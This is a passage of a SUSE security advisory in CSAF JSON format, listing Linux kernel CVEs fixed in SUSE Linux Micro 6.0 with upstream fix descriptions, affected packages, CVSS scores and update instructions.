example, the devlink should be created between the backlight-addon\n(consumer) and the pca9632@62 (supplier). Instead it is created between the\nbacklight-addon (consumer) and the parent of the pca9632@62, which is\ntypically the I2C bus adapter.\n\nOn removal of the above overlay, the LED driver can be removed before the\nbacklight device, resulting in:\n\n Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010\n ...\n Call trace:\n led_put+0xe0/0x140\n devm_led_release+0x6c/0x98\n\nAnother way to reproduce the bug without any device tree overlays is\nunbinding the LED class device (pca9632@62) before unbinding the consumer\n(backlight-addon):\n\n echo 11-0062 \u003e/sys/bus/i2c/drivers/leds-pca963x/unbind\n echo ...backlight-dock \u003e/sys/bus/platform/drivers/led-backlight/unbind\n\nFix by adding a devlink between the consuming led-backlight device and the\nsupplying LED device, as other drivers and subsystems do as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68758",
"url": "https://www.suse.com/security/cve/CVE-2025-68758"
},
{
"category": "external",
"summary": "SUSE Bug 1255944 for CVE-2025-68758",
"url": "https://bugzilla.suse.com/1255944"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68758"
},
{
"cve": "CVE-2025-68759",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68759"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl818x: Fix potential memory leaks in rtl8180_init_rx_ring()\n\nIn rtl8180_init_rx_ring(), memory is allocated for skb packets and DMA\nallocations in a loop. When an allocation fails, the previously\nsuccessful allocations are not freed on exit.\n\nFix that by jumping to err_free_rings label on error, which calls\nrtl8180_free_rx_ring() to free the allocations. Remove the free of\nrx_ring in rtl8180_init_rx_ring() error path, and set the freed\npriv-\u003erx_buf entry to null, to avoid double free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68759",
"url": "https://www.suse.com/security/cve/CVE-2025-68759"
},
{
"category": "external",
"summary": "SUSE Bug 1255934 for CVE-2025-68759",
"url": "https://bugzilla.suse.com/1255934"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68759"
},
{
"cve": "CVE-2025-68764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags\n\nWhen a filesystem is being automounted, it needs to preserve the\nuser-set superblock mount options, such as the \"ro\" flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68764",
"url": "https://www.suse.com/security/cve/CVE-2025-68764"
},
{
"category": "external",
"summary": "SUSE Bug 1255930 for CVE-2025-68764",
"url": "https://bugzilla.suse.com/1255930"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68764"
},
{
"cve": "CVE-2025-68765",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68765"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmt76: mt7615: Fix memory leak in mt7615_mcu_wtbl_sta_add()\n\nIn mt7615_mcu_wtbl_sta_add(), an skb sskb is allocated. If the\nsubsequent call to mt76_connac_mcu_alloc_wtbl_req() fails, the function\nreturns an error without freeing sskb, leading to a memory leak.\n\nFix this by calling dev_kfree_skb() on sskb in the error handling path\nto ensure it is properly released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68765",
"url": "https://www.suse.com/security/cve/CVE-2025-68765"
},
{
"category": "external",
"summary": "SUSE Bug 1255931 for CVE-2025-68765",
"url": "https://bugzilla.suse.com/1255931"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68765"
},
{
"cve": "CVE-2025-68766",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68766"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nirqchip/mchp-eic: Fix error code in mchp_eic_domain_alloc()\n\nIf irq_domain_translate_twocell() sets \"hwirq\" to \u003e= MCHP_EIC_NIRQ (2) then\nit results in an out of bounds access.\n\nThe code checks for invalid values, but doesn\u0027t set the error code. Return\n-EINVAL in that case, instead of returning success.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68766",
"url": "https://www.suse.com/security/cve/CVE-2025-68766"
},
{
"category": "external",
"summary": "SUSE Bug 1255932 for CVE-2025-68766",
"url": "https://bugzilla.suse.com/1255932"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68766"
},
{
"cve": "CVE-2025-68768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68768",
"url": "https://www.suse.com/security/cve/CVE-2025-68768"
},
{
"category": "external",
"summary": "SUSE Bug 1256579 for CVE-2025-68768",
"url": "https://bugzilla.suse.com/1256579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68770",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68770"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68770",
"url": "https://www.suse.com/security/cve/CVE-2025-68770"
},
{
"category": "external",
"summary": "SUSE Bug 1256584 for CVE-2025-68770",
"url": "https://bugzilla.suse.com/1256584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
